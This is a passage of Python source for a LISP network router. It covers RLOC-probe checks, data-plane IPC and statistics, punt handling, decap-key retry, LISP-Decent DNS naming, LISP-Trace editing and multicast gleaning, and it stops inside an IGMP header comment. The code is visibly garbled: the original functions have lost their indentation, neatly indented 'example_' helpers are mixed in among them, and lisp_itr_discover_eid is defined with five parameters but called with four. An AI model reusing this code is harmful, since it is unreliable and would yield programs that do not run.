# 1: Check for Map-Reply RLOC-probe (ITR case)
# -1: Check for either (RTR case)
#
# Return packet pointer untouched if not an RLOC-probe. If it is an RLOC-probe
# request or reply from ourselves, return packet pointer None and source None.
#
def lisp_is_rloc_probe(packet, rr):
udp = (struct.unpack("B", packet[9])[0] == 17)
if (udp == False): return([packet, None, None, None])
sport = struct.unpack("H", packet[20:22])[0]
dport = struct.unpack("H", packet[22:24])[0]
is_lisp = (socket.htons(LISP_CTRL_PORT) in [sport, dport])
if (is_lisp == False): return([packet, None, None, None])
if (rr == 0):
probe = lisp_is_rloc_probe_request(packet[28])
if (probe == False): return([packet, None, None, None])
elif (rr == 1):
probe = lisp_is_rloc_probe_reply(packet[28])
if (probe == False): return([packet, None, None, None])
elif (rr == -1):
probe = lisp_is_rloc_probe_request(packet[28])
if (probe == False):
probe = lisp_is_rloc_probe_reply(packet[28])
if (probe == False): return([packet, None, None, None])
#endif
#endif
#
# Get source address, source port, and TTL. Decrement TTL.
#
source = lisp_address(LISP_AFI_IPV4, "", 32, 0)
source.address = socket.ntohl(struct.unpack("I", packet[12:16])[0])
#
# If this is a RLOC-probe from ourselves, drop.
#
if (source.is_local()): return([None, None, None, None])
#
# Accept, and return source, port, and ttl to caller.
#
source = source.print_address_no_iid()
port = socket.ntohs(struct.unpack("H", packet[20:22])[0])
ttl = struct.unpack("B", packet[8])[0] - 1
packet = packet[28::]
r = bold("Receive(pcap)", False)
f = bold("from " + source, False)
p = lisp_format_packet(packet)
lprint("{} {} bytes {} {}, packet: {}".format(r, len(packet), f, port, p))
return([packet, source, port, ttl])
#enddef
#
# lisp_ipc_write_xtr_parameters
#
# When an external data-plane is running, write the following parameters
# to it:
#
# ipc = { "type" : "xtr-parameters", "control-plane-logging" : False,
# "data-plane-logging" : False, "rtr" : False }
#
def lisp_ipc_write_xtr_parameters(cp, dp):
if (lisp_ipc_dp_socket == None): return
ipc = { "type" : "xtr-parameters", "control-plane-logging" : cp,
"data-plane-logging" : dp, "rtr" : lisp_i_am_rtr }
lisp_write_to_dp_socket(ipc)
return
#enddef
#
# lisp_external_data_plane
#
# Return True if an external data-plane is running. That means that "ipc-data-
# plane = yes" is configured or the lisp-xtr go binary is running.
#
def lisp_external_data_plane():
cmd = 'egrep "ipc-data-plane = yes" ./lisp.config'
if (commands.getoutput(cmd) != ""): return(True)
if (os.getenv("LISP_RUN_LISP_XTR") != None): return(True)
return(False)
#enddef
#
# lisp_process_data_plane_restart
#
# The external data-plane has restarted. We will touch the lisp.config file so
# all configuration information is sent and then traverse the map-cache
# sending each entry to the data-plane so it can regain its state.
#
# This function will also clear the external data-plane map-cache when a user
# clears the map-cache in the lisp-itr or lisp-rtr process.
#
# { "type" : "restart" }
#
def lisp_process_data_plane_restart(do_clear=False):
os.system("touch ./lisp.config")
jdata = { "type" : "entire-map-cache", "entries" : [] }
if (do_clear == False):
entries = jdata["entries"]
lisp_map_cache.walk_cache(lisp_ipc_walk_map_cache, entries)
#endif
lisp_write_to_dp_socket(jdata)
return
#enddef
#
# lisp_process_data_plane_stats
#
# { "type" : "statistics", "entries" :
# [ { "instance-id" : "<iid>", "eid-prefix" : "<eid>", "rlocs" : [
# { "rloc" : "<rloc-1>", "packet-count" : <count>, "byte-count" : <bcount>,
# "seconds-last-packet" : "<timestamp>" }, ...
# { "rloc" : "<rloc-n>", "packet-count" : <count>, "byte-count" : <bcount>,
# "seconds-last-packet" : <system-uptime> } ], ... }
# ]
# }
#
def lisp_process_data_plane_stats(msg, lisp_sockets, lisp_port):
if (msg.has_key("entries") == False):
lprint("No 'entries' in stats IPC message")
return
#endif
if (type(msg["entries"]) != list):
lprint("'entries' in stats IPC message must be an array")
return
#endif
for msg in msg["entries"]:
if (msg.has_key("eid-prefix") == False):
lprint("No 'eid-prefix' in stats IPC message")
continue
#endif
eid_str = msg["eid-prefix"]
if (msg.has_key("instance-id") == False):
lprint("No 'instance-id' in stats IPC message")
continue
#endif
iid = int(msg["instance-id"])
#
# Lookup EID-prefix in map-cache.
#
eid = lisp_address(LISP_AFI_NONE, "", 0, iid)
eid.store_prefix(eid_str)
mc = lisp_map_cache_lookup(None, eid)
if (mc == None):
lprint("Map-cache entry for {} not found for stats update". \
format(eid_str))
continue
#endif
if (msg.has_key("rlocs") == False):
lprint("No 'rlocs' in stats IPC message for {}".format( \
eid_str))
continue
#endif
if (type(msg["rlocs"]) != list):
lprint("'rlocs' in stats IPC message must be an array")
continue
#endif
ipc_rlocs = msg["rlocs"]
#
# Loop through RLOCs in IPC message.
#
for ipc_rloc in ipc_rlocs:
if (ipc_rloc.has_key("rloc") == False): continue
rloc_str = ipc_rloc["rloc"]
if (rloc_str == "no-address"): continue
rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
rloc.store_address(rloc_str)
rloc_entry = mc.get_rloc(rloc)
if (rloc_entry == None): continue
#
# Update stats.
#
pc = 0 if ipc_rloc.has_key("packet-count") == False else \
ipc_rloc["packet-count"]
bc = 0 if ipc_rloc.has_key("byte-count") == False else \
ipc_rloc["byte-count"]
ts = 0 if ipc_rloc.has_key("seconds-last-packet") == False else \
ipc_rloc["seconds-last-packet"]
rloc_entry.stats.packet_count += pc
rloc_entry.stats.byte_count += bc
rloc_entry.stats.last_increment = lisp_get_timestamp() - ts
lprint("Update stats {}/{}/{}s for {} RLOC {}".format(pc, bc,
ts, eid_str, rloc_str))
#endfor
#
# Check if this map-cache entry needs refreshing.
#
if (mc.group.is_null() and mc.has_ttl_elapsed()):
eid_str = green(mc.print_eid_tuple(), False)
lprint("Refresh map-cache entry {}".format(eid_str))
lisp_send_map_request(lisp_sockets, lisp_port, None, mc.eid, None)
#endif
#endfor
return
#enddef
#
# lisp_process_data_plane_decap_stats
#
# { "type" : "decap-statistics",
# "no-decrypt-key" : { "packet-count" : <count>, "byte-count" : <bcount>,
# "seconds-last-packet" : <seconds> },
# "outer-header-error" : { "packet-count" : <count>, "byte-count" : <bcount>,
# "seconds-last-packet" : <seconds> },
# "bad-inner-version" : { "packet-count" : <count>, "byte-count" : <bcount>,
# "seconds-last-packet" : <seconds> },
# "good-packets" : { "packet-count" : <count>, "byte-count" : <bcount>,
# "seconds-last-packet" : <seconds> },
# "ICV-error" : { "packet-count" : <count>, "byte-count" : <bcount>,
# "seconds-last-packet" : <seconds> },
# "checksum-error" : { "packet-count" : <count>, "byte-count" : <bcount>,
# "seconds-last-packet" : <seconds> }
# }
#
# If we are an RTR, we can process the stats directly. If we are an ITR, we
# need to send an IPC message to the lisp-etr process.
#
def lisp_process_data_plane_decap_stats(msg, lisp_ipc_socket):
#
# Send IPC message to lisp-etr process. Variable 'msg' is a dict array.
# Needs to be passed in IPC message as a string.
#
if (lisp_i_am_itr):
lprint("Send decap-stats IPC message to lisp-etr process")
ipc = "stats%{}".format(json.dumps(msg))
ipc = lisp_command_ipc(ipc, "lisp-itr")
lisp_ipc(ipc, lisp_ipc_socket, "lisp-etr")
return
#endif
#
# Process stats counters in lisp-etr and lisp-rtr processes. Variable 'msg'
# is a dictionary array when the ITR/RTR is processing msg. When an ETR
# is processing it, it recevied a json string from the ITR so it needs
# to convert to a dictionary array.
#
ipc = bold("IPC", False)
lprint("Process decap-stats {} message: '{}'".format(ipc, msg))
if (lisp_i_am_etr): msg = json.loads(msg)
key_names = ["good-packets", "ICV-error", "checksum-error",
"lisp-header-error", "no-decrypt-key", "bad-inner-version",
"outer-header-error"]
for key_name in key_names:
pc = 0 if msg.has_key(key_name) == False else \
msg[key_name]["packet-count"]
lisp_decap_stats[key_name].packet_count += pc
bc = 0 if msg.has_key(key_name) == False else \
msg[key_name]["byte-count"]
lisp_decap_stats[key_name].byte_count += bc
ts = 0 if msg.has_key(key_name) == False else \
msg[key_name]["seconds-last-packet"]
lisp_decap_stats[key_name].last_increment = lisp_get_timestamp() - ts
#endfor
return
#enddef
#
# lisp_process_punt
#
# Another data-plane is punting a packet to us so we can discover a source
# EID, send a map-request, or store statistics data. The formats of the JSON
# messages are for types: "discovery", "restart", "statistics", and "decap-
# statistics". This function calls helper functions for the stats and restart
# types and itself processes the logic for:
#
# { "type" : "discovery", "source-eid" : <eid-source-address>,
# "dest-eid" : <eid-dest-address>, "interface" : "<device-name>",
# "instance-id" : <iid> }
#
def lisp_process_punt(punt_socket, lisp_send_sockets, lisp_ephem_port):
message, source = punt_socket.recvfrom(4000)
msg = json.loads(message)
if (type(msg) != dict):
lprint("Invalid punt message from {}, not in JSON format". \
format(source))
return
#endif
punt = bold("Punt", False)
lprint("{} message from '{}': '{}'".format(punt, source, msg))
if (msg.has_key("type") == False):
lprint("Punt IPC message has no 'type' key")
return
#endif
#
# Process statistics message.
#
if (msg["type"] == "statistics"):
lisp_process_data_plane_stats(msg, lisp_send_sockets, lisp_ephem_port)
return
#endif
if (msg["type"] == "decap-statistics"):
lisp_process_data_plane_decap_stats(msg, punt_socket)
return
#endif
#
# Process restart message.
#
if (msg["type"] == "restart"):
lisp_process_data_plane_restart()
return
#endif
#
# Process possible punt packet discovery message.
#
if (msg["type"] != "discovery"):
lprint("Punt IPC message has wrong format")
return
#endif
if (msg.has_key("interface") == False):
lprint("Invalid punt message from {}, required keys missing". \
format(source))
return
#endif
#
# Drop control-messages designated as instance-ID 0xffffff (or -1 in JSON).
#
device = msg["interface"]
if (device == ""):
iid = int(msg["instance-id"])
if (iid == -1): return
else:
iid = lisp_get_interface_instance_id(device, None)
#endif
#
# Validate EID format.
#
seid = None
if (msg.has_key("source-eid")):
source_eid = msg["source-eid"]
seid = lisp_address(LISP_AFI_NONE, source_eid, 0, iid)
if (seid.is_null()):
lprint("Invalid source-EID format '{}'".format(source_eid))
return
#endif
#endif
deid = None
if (msg.has_key("dest-eid")):
dest_eid = msg["dest-eid"]
deid = lisp_address(LISP_AFI_NONE, dest_eid, 0, iid)
if (deid.is_null()):
lprint("Invalid dest-EID format '{}'".format(dest_eid))
return
#endif
#endif
#
# Do source-EID discovery.
#
# Make sure we have a configured database-mapping entry for this EID.
#
if (seid):
e = green(seid.print_address(), False)
db = lisp_db_for_lookups.lookup_cache(seid, False)
if (db != None):
#
# Check accept policy and if accepted, discover EID by putting
# in discovery cache. ETR will register it.
#
if (db.dynamic_eid_configured()):
interface = lisp_allow_dynamic_eid(device, seid)
if (interface != None and lisp_i_am_itr):
lisp_itr_discover_eid(db, seid, device, interface)
else:
lprint(("Disallow dynamic source-EID {} " + \
"on interface {}").format(e, device))
#endif
#endif
else:
lprint("Punt from non-EID source {}".format(e))
#endif
#endif
#
# Do Map-Request processing on destination.
#
if (deid):
mc = lisp_map_cache_lookup(seid, deid)
if (mc == None or mc.action == LISP_SEND_MAP_REQUEST_ACTION):
#
# Check if we should rate-limit Map-Request and if not send
# Map-Request.
#
if (lisp_rate_limit_map_request(deid)): return
lisp_send_map_request(lisp_send_sockets, lisp_ephem_port,
seid, deid, None)
else:
e = green(deid.print_address(), False)
lprint("Map-cache entry for {} already exists".format(e))
#endif
#endif
return
#enddef
#
# lisp_ipc_map_cache_entry
#
# Callback from class lisp_cache.walk_cache().
#
def lisp_ipc_map_cache_entry(mc, jdata):
entry = lisp_write_ipc_map_cache(True, mc, dont_send=True)
jdata.append(entry)
return([True, jdata])
#enddef
#
# lisp_ipc_walk_map_cache
#
# Walk the entries in the lisp_map_cache(). And then subsequently walk the
# entries in lisp_mapping.source_cache().
#
def lisp_ipc_walk_map_cache(mc, jdata):
#
# There is only destination state in this map-cache entry.
#
if (mc.group.is_null()): return(lisp_ipc_map_cache_entry(mc, jdata))
if (mc.source_cache == None): return([True, jdata])
#
# There is (source, group) state so walk all sources for this group
# entry.
#
jdata = mc.source_cache.walk_cache(lisp_ipc_map_cache_entry, jdata)
return([True, jdata])
#enddef
#
# lisp_itr_discover_eid
#
# Put dynamic-EID in db.dynamic_eids{} array.
#
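# Illustrative IPC message sent to the lisp-etr process below (hypothetical
# EID and interface): "learn%10.1.1.1%eth0".
#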
def lisp_itr_discover_eid(db, eid, input_interface, routed_interface,
lisp_ipc_listen_socket):
eid_str = eid.print_address()
if (db.dynamic_eids.has_key(eid_str)):
db.dynamic_eids[eid_str].last_packet = lisp_get_timestamp()
return
#endif
#
# Add to list.
#
dyn_eid = lisp_dynamic_eid()
dyn_eid.dynamic_eid.copy_address(eid)
dyn_eid.interface = routed_interface
dyn_eid.last_packet = lisp_get_timestamp()
dyn_eid.get_timeout(routed_interface)
db.dynamic_eids[eid_str] = dyn_eid
routed = ""
if (input_interface != routed_interface):
routed = ", routed-interface " + routed_interface
#endif
eid_string = green(eid_str, False) + bold(" discovered", False)
lprint("Dynamic-EID {} on interface {}{}, timeout {}".format( \
eid_string,input_interface, routed, dyn_eid.timeout))
#
# Tell ETR process so it can register dynamic-EID.
#
ipc = "learn%{}%{}".format(eid_str, routed_interface)
ipc = lisp_command_ipc(ipc, "lisp-itr")
lisp_ipc(ipc, lisp_ipc_listen_socket, "lisp-etr")
return
#enddef
#
# lisp_retry_decap_keys
#
# A decap-key was copied from x.x.x.x:p to x.x.x.x, but it was the wrong one.
# Copy x.x.x.x:q to x.x.x.x. This is an expensive function. But it is hardly
# used. And once it is used for a particular addr_str, it shouldn't be used
# again.
#
# This function is only used when an ICV error occurs when x.x.x.x is the
# crypto-key used.
#
def lisp_retry_decap_keys(addr_str, packet, iv, packet_icv):
if (lisp_search_decap_keys == False): return
#
# Only use this function when the key matched was not port based.
#
if (addr_str.find(":") != -1): return
parent = lisp_crypto_keys_by_rloc_decap[addr_str]
for key in lisp_crypto_keys_by_rloc_decap:
#
# Find entry that has same source RLOC.
#
if (key.find(addr_str) == -1): continue
#
# Skip over parent entry.
#
if (key == addr_str): continue
#
# If crypto-keys the same, go to find next one.
#
entry = lisp_crypto_keys_by_rloc_decap[key]
if (entry == parent): continue
#
# Try ICV check. If works, then go to this key.
#
crypto_key = entry[1]
if (packet_icv != crypto_key.do_icv(packet, iv)):
lprint("Test ICV with key {} failed".format(red(key, False)))
continue
#endif
lprint("Changing decap crypto key to {}".format(red(key, False)))
lisp_crypto_keys_by_rloc_decap[addr_str] = entry
#endif
return
#enddef
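#
# example_retry_icv
#
# A standalone sketch of the key-retry idea used in lisp_retry_decap_keys()
# above: walk all candidate keys that share the source RLOC address and keep
# the first one whose ICV matches. The HMAC-SHA256 construction here is an
# assumption for illustration only; the real ICV computation is whatever
# do_icv() implements. Inputs are byte strings and candidate_keys maps
# "addr:port" strings to raw key bytes.
#
def example_retry_icv(candidate_keys, addr_str, packet, iv, packet_icv):
    import hmac, hashlib
    for key_name in candidate_keys:
        if (key_name.find(addr_str) == -1): continue
        computed = hmac.new(candidate_keys[key_name], iv + packet,
            hashlib.sha256).hexdigest()
        if (computed != packet_icv): continue
        return(key_name)
    #endfor
    return(None)
#enddef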
#
# lisp_decent_pull_xtr_configured
#
# Return True if configured LISP-Decent modulus is not 0. Meaning we are using
# the LISP-Decent pull-based mapping system.
#
def lisp_decent_pull_xtr_configured():
return(lisp_decent_modulus != 0 and lisp_decent_dns_suffix != None)
#enddef
#
# lisp_is_decent_dns_suffix
#
# Return True if supplied DNS name ends with a configured LISP-Decent DNS
# suffix.
#
def lisp_is_decent_dns_suffix(dns_name):
if (lisp_decent_dns_suffix == None): return(False)
name = dns_name.split(".")
name = ".".join(name[1::])
return(name == lisp_decent_dns_suffix)
#enddef
#
# lisp_get_decent_index
#
# Hash the EID-prefix and mod the configured LISP-Decent modulus value.
#
def lisp_get_decent_index(eid):
eid_str = eid.print_prefix()
hash_value = hashlib.sha256(eid_str).hexdigest()
index = int(hash_value, 16) % lisp_decent_modulus
return(index)
#enddef
#
# lisp_get_decent_dns_name
#
# Based on EID, get index and prepend to LISP-Decent DNS name suffix.
#
def lisp_get_decent_dns_name(eid):
index = lisp_get_decent_index(eid)
return(str(index) + "." + lisp_decent_dns_suffix)
#enddef
#
# lisp_get_decent_dns_name_from_str
#
# The supplied EID is an address passed as a string. Build an internal
# lisp_address() to pass into lisp_get_decent_index().
#
def lisp_get_decent_dns_name_from_str(iid, eid_str):
eid = lisp_address(LISP_AFI_NONE, eid_str, 0, iid)
index = lisp_get_decent_index(eid)
return(str(index) + "." + lisp_decent_dns_suffix)
#enddef
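#
# example_decent_dns_name
#
# A self-contained sketch of the LISP-Decent index computation used by the
# functions above: sha256 the EID-prefix string, take the digest modulo the
# configured modulus, and prepend the index to the DNS suffix. The argument
# values in the comment below are made-up examples.
#
# example_decent_dns_name("[1000]10.1.0.0/16", 4, "lisp-decent.example.com")
# returns "<index>.lisp-decent.example.com" where <index> is in 0..3.
#
def example_decent_dns_name(eid_prefix_str, modulus, dns_suffix):
    import hashlib
    hash_value = hashlib.sha256(eid_prefix_str.encode()).hexdigest()
    index = int(hash_value, 16) % modulus
    return(str(index) + "." + dns_suffix)
#enddef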
#
# lisp_trace_append
#
# Append JSON data to a LISP-Trace packet. If this is the ETR, the EIDs will
# be swapped to return the packet to the originator.
#
# Returning False means the caller should return (and not forward the packet).
#
def lisp_trace_append(packet, reason=None, ed="encap", lisp_socket=None,
rloc_entry=None):
offset = 28 if packet.inner_version == 4 else 48
trace_pkt = packet.packet[offset::]
trace = lisp_trace()
if (trace.decode(trace_pkt) == False):
lprint("Could not decode JSON portion of a LISP-Trace packet")
return(False)
#endif
next_rloc = "?" if packet.outer_dest.is_null() else \
packet.outer_dest.print_address_no_iid()
#
# Display the port if the caller is an encapsulating RTR using a translated
# RLOC.
#
if (next_rloc != "?" and packet.encap_port != LISP_DATA_PORT):
if (ed == "encap"): next_rloc += ":{}".format(packet.encap_port)
#endif
#
# Add node entry data for the encapsulation or decapsulation.
#
entry = {}
entry["node"] = "ITR" if lisp_i_am_itr else "ETR" if lisp_i_am_etr else \
"RTR" if lisp_i_am_rtr else "?"
srloc = packet.outer_source
if (srloc.is_null()): srloc = lisp_myrlocs[0]
entry["srloc"] = srloc.print_address_no_iid()
#
# In the source RLOC include the ephemeral port number of the ltr client
# so RTRs can return errors to the client behind a NAT.
#
if (entry["node"] == "ITR" and packet.inner_sport != LISP_TRACE_PORT):
entry["srloc"] += ":{}".format(packet.inner_sport)
#endif
entry["hn"] = lisp_hostname
key = ed + "-ts"
entry[key] = lisp_get_timestamp()
#
# If this is an ETR decap entry and the drloc is "?", the packet came in on
# lisp_etr_nat_data_plane() where the kernel strips the outer header. Get
# the local/private RLOC from our database-mapping.
#
if (next_rloc == "?" and entry["node"] == "ETR"):
db = lisp_db_for_lookups.lookup_cache(packet.inner_dest, False)
if (db != None and len(db.rloc_set) >= 1):
next_rloc = db.rloc_set[0].rloc.print_address_no_iid()
#endif
#endif
entry["drloc"] = next_rloc
#
# If there is a reason there is no dest RLOC, include it.
#
if (next_rloc == "?" and reason != None):
entry["drloc"] += " ({})".format(reason)
#endif
#
# Add recent-rtts, recent-hops, and recent-latencies.
#
if (rloc_entry != None):
entry["rtts"] = rloc_entry.recent_rloc_probe_rtts
entry["hops"] = rloc_entry.recent_rloc_probe_hops
entry["latencies"] = rloc_entry.recent_rloc_probe_latencies
#endif
#
# Build seid->deid record if it does not exist. Then append node entry
# to record below, in the search loop.
#
seid = packet.inner_source.print_address()
deid = packet.inner_dest.print_address()
if (trace.packet_json == []):
rec = {}
rec["seid"] = seid
rec["deid"] = deid
rec["paths"] = []
trace.packet_json.append(rec)
#endif
#
# Search for the record. If we are appending the first ITR node entry, get
# its RLOC address in case we have to return the packet to the sender.
#
for rec in trace.packet_json:
if (rec["deid"] != deid): continue
rec["paths"].append(entry)
break
#endfor
#
# If we are destination-EID, add a new record deid->seid if we have not
# completed a round-trip. The ETR will deliver this packet from its own
# EID which means the co-located ITR will pcap the packet and add its
# encap node entry.
#
swap = False
if (len(trace.packet_json) == 1 and entry["node"] == "ETR" and
trace.myeid(packet.inner_dest)):
rec = {}
rec["seid"] = deid
rec["deid"] = seid
rec["paths"] = []
trace.packet_json.append(rec)
swap = True
#endif
#
# Print the JSON packet after we appended data to it. Put the new JSON in
# packet. Fix up lengths and checksums from inner headers.
#
trace.print_trace()
trace_pkt = trace.encode()
#
# If next_rloc is not known, we need to return packet to sender.
#
# Otherwise we are forwarding a packet that is about to be encapsulated, or we
# are forwarding a packet that was just decapsulated with the addresses
# swapped so we can turn it around.
#
sender_rloc = trace.packet_json[0]["paths"][0]["srloc"]
if (next_rloc == "?"):
lprint("LISP-Trace return to sender RLOC {}".format(sender_rloc))
trace.return_to_sender(lisp_socket, sender_rloc, trace_pkt)
return(False)
#endif
#
# Compute length of trace packet. This includes the UDP header, Trace
# header, and JSON payload.
#
udplen = trace.packet_length()
#
# Fix up UDP length and recompute UDP checksum if IPv6 packet, zero
# otherwise. Only do checksum when the Trace went round-trip and this is
# the local ETR delivery EID-based Trace packet to the client ltr.
#
headers = packet.packet[0:offset]
p = struct.pack("HH", socket.htons(udplen), 0)
headers = headers[0:offset-4] + p
if (packet.inner_version == 6 and entry["node"] == "ETR" and
len(trace.packet_json) == 2):
udp = headers[offset-8::] + trace_pkt
udp = lisp_udp_checksum(seid, deid, udp)
headers = headers[0:offset-8] + udp[0:8]
#endif
#
# If we are swapping addresses, do it here so the JSON append and IP
# header field changes are all reflected in the new IPv4 header checksum.
#
if (swap):
if (packet.inner_version == 4):
headers = headers[0:12] + headers[16:20] + headers[12:16] + \
headers[22:24] + headers[20:22] + headers[24::]
else:
headers = headers[0:8] + headers[24:40] + headers[8:24] + \
headers[42:44] + headers[40:42] + headers[44::]
#endif
d = packet.inner_dest
packet.inner_dest = packet.inner_source
packet.inner_source = d
#endif
#
# Fix up IP length.
#
offset = 2 if packet.inner_version == 4 else 4
iplen = 20 + udplen if packet.inner_version == 4 else udplen
h = struct.pack("H", socket.htons(iplen))
headers = headers[0:offset] + h + headers[offset+2::]
#
# Fix up IPv4 header checksum.
#
if (packet.inner_version == 4):
c = struct.pack("H", 0)
headers = headers[0:10] + c + headers[12::]
h = lisp_ip_checksum(headers[0:20])
headers = h + headers[20::]
#endif
#
# Caller is forwarding packet, either as an ITR, RTR, or ETR.
#
packet.packet = headers + trace_pkt
return(True)
#enddef
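#
# example_fixup_ipv4_header
#
# A standalone sketch of the length and checksum fix-up performed at the end
# of lisp_trace_append(), written against a bare 20-byte IPv4 header (no
# options) rather than the packet.packet buffer used above. udplen is the
# UDP length including the UDP header.
#
def example_fixup_ipv4_header(headers, udplen):
    import struct
    #
    # Rewrite the total-length field (bytes 2-3) and zero the header
    # checksum field (bytes 10-11).
    #
    headers = headers[0:2] + struct.pack("!H", 20 + udplen) + \
        headers[4:10] + struct.pack("!H", 0) + headers[12:20]
    #
    # Recompute the checksum: one's-complement sum of the ten 16-bit words.
    #
    checksum = 0
    for i in range(0, 20, 2):
        checksum += struct.unpack("!H", headers[i:i+2])[0]
    #endfor
    while (checksum >> 16): checksum = (checksum & 0xffff) + (checksum >> 16)
    checksum = ~checksum & 0xffff
    return(headers[0:10] + struct.pack("!H", checksum) + headers[12:20])
#enddef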
#
# lisp_allow_gleaning
#
# Check the lisp_glean_mappings array to see if we should glean the EID and
# RLOC. Find the first match. Return (False, False, False) if there are no
# configured glean mappings. The second return value indicates whether the
# matched entry was configured to RLOC-probe the gleaned RLOC, and the third
# whether it was configured for IGMP querying.
#
def lisp_allow_gleaning(eid, group, rloc):
if (lisp_glean_mappings == []): return(False, False, False)
for entry in lisp_glean_mappings:
if (entry.has_key("instance-id")):
iid = eid.instance_id
low, high = entry["instance-id"]
if (iid < low or iid > high): continue
#endif
if (entry.has_key("eid-prefix")):
e = copy.deepcopy(entry["eid-prefix"])
e.instance_id = eid.instance_id
if (eid.is_more_specific(e) == False): continue
#endif
if (entry.has_key("group-prefix")):
if (group == None): continue
g = copy.deepcopy(entry["group-prefix"])
g.instance_id = group.instance_id
if (group.is_more_specific(g) == False): continue
#endif
if (entry.has_key("rloc-prefix")):
if (rloc != None and rloc.is_more_specific(entry["rloc-prefix"])
== False): continue
#endif
return(True, entry["rloc-probe"], entry["igmp-query"])
#endfor
return(False, False, False)
#enddef
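#
# example_allow_gleaning
#
# A simplified sketch of the first-match policy walk done by
# lisp_allow_gleaning() above, using the Python 3 stdlib ipaddress module and
# plain dictionaries whose "eid-prefix" and "rloc-prefix" values are prefix
# strings. The real lisp_glean_mappings entries hold lisp_address() objects,
# group-prefixes, and instance-id ranges, which are omitted here.
#
def example_allow_gleaning(eid_str, rloc_str, glean_mappings):
    import ipaddress
    eid = ipaddress.ip_address(eid_str)
    rloc = ipaddress.ip_address(rloc_str)
    for entry in glean_mappings:
        if ("eid-prefix" in entry):
            if (eid not in ipaddress.ip_network(entry["eid-prefix"])): continue
        #endif
        if ("rloc-prefix" in entry):
            if (rloc not in ipaddress.ip_network(entry["rloc-prefix"])): continue
        #endif
        return(True, entry.get("rloc-probe", False),
            entry.get("igmp-query", False))
    #endfor
    return(False, False, False)
#enddef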
#
# lisp_build_gleaned_multicast
#
# Build (*,G) map-cache entry in RTR with gleaned RLOC info from IGMP report.
#
def lisp_build_gleaned_multicast(seid, geid, rloc, port, igmp):
group_str = geid.print_address()
seid_name = seid.print_address_no_iid()
s = green("{}".format(seid_name), False)
e = green("(*, {})".format(group_str), False)
r = red(rloc.print_address_no_iid() + ":" + str(port), False)
#
# Support (*,G) only gleaning. Scales better anyway.
#
mc = lisp_map_cache_lookup(seid, geid)
if (mc == None):
mc = lisp_mapping("", "", [])
mc.group.copy_address(geid)
mc.eid.copy_address(geid)
mc.eid.address = 0
mc.eid.mask_len = 0
mc.mapping_source.copy_address(rloc)
mc.map_cache_ttl = LISP_IGMP_TTL
mc.gleaned = True
mc.add_cache()
lprint("Add gleaned EID {} to map-cache".format(e))
#endif
#
# Check to see if RLE node exists. If so, update the RLE node RLOC and
# encap-port.
#
rloc_entry = rle_entry = rle_node = None
if (mc.rloc_set != []):
rloc_entry = mc.rloc_set[0]
if (rloc_entry.rle):
rle_entry = rloc_entry.rle
for rn in rle_entry.rle_nodes:
if (rn.rloc_name != seid_name): continue
rle_node = rn
break
#endfor
#endif
#endif
#
# Adding RLE to existing rloc-set or create new one.
#
if (rloc_entry == None):
rloc_entry = lisp_rloc()
mc.rloc_set = [rloc_entry]
rloc_entry.priority = 253
rloc_entry.mpriority = 255
mc.build_best_rloc_set()
#endif
if (rle_entry == None):
rle_entry = lisp_rle(geid.print_address())
rloc_entry.rle = rle_entry
#endif
if (rle_node == None):
rle_node = lisp_rle_node()
rle_node.rloc_name = seid_name
rle_entry.rle_nodes.append(rle_node)
rle_entry.build_forwarding_list()
lprint("Add RLE {} from {} for gleaned EID {}".format(r, s, e))
elif (rloc.is_exact_match(rle_node.address) == False or
port != rle_node.translated_port):
lprint("Changed RLE {} from {} for gleaned EID {}".format(r, s, e))
#endif
#
# Add or update.
#
rle_node.store_translated_rloc(rloc, port)
#
# An IGMP report was received. Update timestamp so we don't time out
# actively joined groups.
#
if (igmp):
seid_str = seid.print_address()
if (lisp_gleaned_groups.has_key(seid_str) == False):
lisp_gleaned_groups[seid_str] = {}
#endif
lisp_gleaned_groups[seid_str][group_str] = lisp_get_timestamp()
#endif
#enddef
#
# lisp_remove_gleaned_multicast
#
# Remove an RLE from a gleaned entry since an IGMP Leave message was received.
#
def lisp_remove_gleaned_multicast(seid, geid):
#
# Support (*,G) only gleaning. Scales better anyway.
#
mc = lisp_map_cache_lookup(seid, geid)
if (mc == None): return
rle = mc.rloc_set[0].rle
if (rle == None): return
rloc_name = seid.print_address_no_iid()
found = False
for rle_node in rle.rle_nodes:
if (rle_node.rloc_name == rloc_name):
found = True
break
#endif
#endfor
if (found == False): return
#
# Found entry to remove.
#
rle.rle_nodes.remove(rle_node)
rle.build_forwarding_list()
group_str = geid.print_address()
seid_str = seid.print_address()
s = green("{}".format(seid_str), False)
e = green("(*, {})".format(group_str), False)
lprint("Gleaned EID {} RLE removed for {}".format(e, s))
#
# Remove that EID has joined the group.
#
if (lisp_gleaned_groups.has_key(seid_str)):
if (lisp_gleaned_groups[seid_str].has_key(group_str)):
lisp_gleaned_groups[seid_str].pop(group_str)
#endif
#endif
#
# Remove map-cache entry if no more RLEs present.
#
if (rle.rle_nodes == []):
mc.delete_cache()
lprint("Gleaned EID {} remove, no more RLEs".format(e))
#endif
#enddef
#
# lisp_change_gleaned_multicast
#
# Change RLOC for each gleaned group this EID has joined.
#
def lisp_change_gleaned_multicast(seid, rloc, port):
seid_str = seid.print_address()
if (lisp_gleaned_groups.has_key(seid_str) == False): return
for group in lisp_gleaned_groups[seid_str]:
lisp_geid.store_address(group)
lisp_build_gleaned_multicast(seid, lisp_geid, rloc, port, False)
#endfor
#enddef
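#
# example_track_gleaned_group
#
# A minimal sketch of the bookkeeping the three functions above perform on
# lisp_gleaned_groups: a dictionary keyed by source-EID string, whose value
# is a dictionary of group string to last-join timestamp. This helper is
# illustrative only and uses time.time() instead of lisp_get_timestamp().
#
def example_track_gleaned_group(gleaned_groups, seid_str, group_str, join):
    import time
    if (join):
        if (seid_str not in gleaned_groups): gleaned_groups[seid_str] = {}
        gleaned_groups[seid_str][group_str] = time.time()
    elif (seid_str in gleaned_groups):
        gleaned_groups[seid_str].pop(group_str, None)
    #endif
    return(gleaned_groups)
#enddef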
#
# lisp_process_igmp_packet
#
# Process IGMP packets.
#
# Report types (0x12, 0x16, 0x22) are Joins; the Leave type is 0x17.
#
#
# An IGMPv1 and IGMPv2 report format is:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |Version| Type | Unused | Checksum |
